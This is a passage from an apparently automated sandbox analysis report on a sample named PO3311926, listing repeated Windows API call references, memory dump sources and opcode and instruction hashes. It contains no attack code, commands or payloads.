                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ad9bed6dbcb13be6aa506bff8e571b8828195af8159dc6d2f9cb86a2e2e522ff
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: ad9bed6dbcb13be6aa506bff8e571b8828195af8159dc6d2f9cb86a2e2e522ff
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d2ddf329d97258893aaa81ea6aaca39106ad1073c8cbaa4897995c336da25a8e
                                                                                              • Instruction ID: 6f57e2e0320c3784bd5dff851214a91384a00fd301ad9866c2eb8bcfeaa2e831
                                                                                              • Opcode Fuzzy Hash: d2ddf329d97258893aaa81ea6aaca39106ad1073c8cbaa4897995c336da25a8e
                                                                                              • Instruction Fuzzy Hash: 8EA011E22A80023E30882200AC82CFB02CEC0C0B2033080AEF830AA0E0BCC0880028B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9c05691cac6e0ec42c11d6f6303414d6972988a414940f8c6a6c61a6842cc130
                                                                                              • Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
                                                                                              • Opcode Fuzzy Hash: 9c05691cac6e0ec42c11d6f6303414d6972988a414940f8c6a6c61a6842cc130
                                                                                              • Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0b15f76e6e476e885ee39e15a064b24a024d424cfb649b01722f596ce8e43c04
                                                                                              • Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
                                                                                              • Opcode Fuzzy Hash: 0b15f76e6e476e885ee39e15a064b24a024d424cfb649b01722f596ce8e43c04
                                                                                              • Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 50b8deae2ba749cfb636cccb41190c9e02ab548f0097d120a84ea50dd3521afa
                                                                                              • Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
                                                                                              • Opcode Fuzzy Hash: 50b8deae2ba749cfb636cccb41190c9e02ab548f0097d120a84ea50dd3521afa
                                                                                              • Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3eb6b9425c77dca17a0de4ad1450fcee55e8b35a06af854d88a85eda52d9ea90
                                                                                              • Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
                                                                                              • Opcode Fuzzy Hash: 3eb6b9425c77dca17a0de4ad1450fcee55e8b35a06af854d88a85eda52d9ea90
                                                                                              • Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4a7da291aaf69ddbe6aa24b16e8d89251da5259318c812e1152342b8ab6469c3
                                                                                              • Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
                                                                                              • Opcode Fuzzy Hash: 4a7da291aaf69ddbe6aa24b16e8d89251da5259318c812e1152342b8ab6469c3
                                                                                              • Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE580
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3c4932670b38e2dab36fb48475c46fd6acea2da36fd97e84afccedabf8fc8e9e
                                                                                              • Instruction ID: 4e3c93c94b85962dc0d86c9a0b990a82f2abae36e5a97531ef4cddd21d30bd0b
                                                                                              • Opcode Fuzzy Hash: 3c4932670b38e2dab36fb48475c46fd6acea2da36fd97e84afccedabf8fc8e9e
                                                                                              • Instruction Fuzzy Hash: 4BA011C22A8002BE300822A0AC02CFB02CEC8C0B2033088AFF822820E0B8C088000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE580
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 33c821d854faa10a138c46120af5dca8f25e20ac0d6c44a7e963d31be7fe5d03
                                                                                              • Instruction ID: 4e3c93c94b85962dc0d86c9a0b990a82f2abae36e5a97531ef4cddd21d30bd0b
                                                                                              • Opcode Fuzzy Hash: 33c821d854faa10a138c46120af5dca8f25e20ac0d6c44a7e963d31be7fe5d03
                                                                                              • Instruction Fuzzy Hash: 4BA011C22A8002BE300822A0AC02CFB02CEC8C0B2033088AFF822820E0B8C088000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE580
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 46e6bcacff46d9293fdb75339445849fed00f899f850f4a5e426711953ca7942
                                                                                              • Instruction ID: f1bfc1936bf3f2cfb1aede414c75ca2733b9f88594463ea7fe7f12840683e117
                                                                                              • Opcode Fuzzy Hash: 46e6bcacff46d9293fdb75339445849fed00f899f850f4a5e426711953ca7942
                                                                                              • Instruction Fuzzy Hash: A5A011C22A80023E300822A0AC02CFB0ACEC8E0B2233082AFF820A20E0B8C088000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: baf6c387625ca1601ec61197e636e14de2a72625c9846f38eae3a4943fcc55cd
                                                                                              • Instruction ID: ee0865d1aafa13104ab2b47ddf555df7138e3c77fc72d81728d60fcf8062cf1c
                                                                                              • Opcode Fuzzy Hash: baf6c387625ca1601ec61197e636e14de2a72625c9846f38eae3a4943fcc55cd
                                                                                              • Instruction Fuzzy Hash: 15A011C22A8802BE30082200AC02CFB0ACEC0C2F203308AEEF822800A0B8C08C000832
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1eca4ef966d2f19ae2066979d5df3a23e1e75ef4239d9d51c89293ba3b1cc5bd
                                                                                              • Instruction ID: ee0865d1aafa13104ab2b47ddf555df7138e3c77fc72d81728d60fcf8062cf1c
                                                                                              • Opcode Fuzzy Hash: 1eca4ef966d2f19ae2066979d5df3a23e1e75ef4239d9d51c89293ba3b1cc5bd
                                                                                              • Instruction Fuzzy Hash: 15A011C22A8802BE30082200AC02CFB0ACEC0C2F203308AEEF822800A0B8C08C000832
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3f90b163828601474e6f349b3541c7a8cb37a0390d1eb1921078087cdf955e86
                                                                                              • Instruction ID: ee0865d1aafa13104ab2b47ddf555df7138e3c77fc72d81728d60fcf8062cf1c
                                                                                              • Opcode Fuzzy Hash: 3f90b163828601474e6f349b3541c7a8cb37a0390d1eb1921078087cdf955e86
                                                                                              • Instruction Fuzzy Hash: 15A011C22A8802BE30082200AC02CFB0ACEC0C2F203308AEEF822800A0B8C08C000832
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,00BA903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00BA9F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: bed398f22294a419b43dd156aa34f6b852cccb26c2ece21f4b890cb028933646
                                                                                              • Instruction ID: 101c3d80819b2bf305199672ed6bde0d2d6b7156a12237a5d9c9f651737d16f6
                                                                                              • Opcode Fuzzy Hash: bed398f22294a419b43dd156aa34f6b852cccb26c2ece21f4b890cb028933646
                                                                                              • Instruction Fuzzy Hash: 77A0113008000A8A8E002B30CA2820CBB20EB20BC030082A8A00ACB0A2CB22880B8A02
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00BBAE72,C:\Users\user\Desktop,00000000,00BE946A,00000006), ref: 00BBAC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: cc8bf6324207a7db949a0868adcc129a3b083d5e661745baadda9432d38dbab4
                                                                                              • Instruction ID: 8b8838450b7b107e1208f0faa0fc9235b4fa4c84e9e1727b167589595a0967c0
                                                                                              • Opcode Fuzzy Hash: cc8bf6324207a7db949a0868adcc129a3b083d5e661745baadda9432d38dbab4
                                                                                              • Instruction Fuzzy Hash: 78A011302022028B82000B328F0AA0EBBAAAFA2B00F00C02AA00080030EB30C820AA02
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
